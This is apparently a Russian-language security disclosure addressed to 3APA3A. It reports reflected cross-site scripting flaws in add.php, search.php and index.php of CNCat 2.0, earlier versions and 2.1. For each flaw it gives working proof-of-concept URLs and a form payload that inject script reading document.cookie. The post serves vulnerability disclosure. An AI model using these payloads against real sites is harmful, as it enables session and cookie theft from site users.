Cross-Site Scripting vulnerabilities in CNCat

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в CNCat.

XSS:

Уязвимости в add.php (можно как через GET, так и через POST), search.php и
index.php.

http://site/add.php?description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/search.php?q=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уязвима версия CNCat 2.0 и предыдущие версии.

Версия CNCat 2.1 также уязвима - в index.php и для POST запроса в add.php.

XSS:

http://site/?c=0&o=0%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

POST запрос на странице http://site/add.php

</textarea><script>alert(document.cookie)</script>
В поле Описание.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2263/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua